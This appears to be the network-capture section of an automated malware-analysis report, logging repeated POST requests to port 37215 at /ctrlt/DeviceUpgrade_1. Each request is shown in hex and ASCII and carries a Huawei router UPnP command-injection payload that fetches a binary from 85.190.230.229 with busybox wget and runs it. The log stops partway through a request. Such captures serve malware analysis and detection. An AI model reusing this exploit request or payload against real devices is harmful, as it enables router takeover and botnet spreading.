                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.961966991 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.601928949 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:11.850013018 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:14.473778963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:19.593657017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:29.577115059 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:50.568298101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:31.526633024 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      145192.168.2.145258841.160.45.23437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:09.433167934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.961966991 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.601941109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
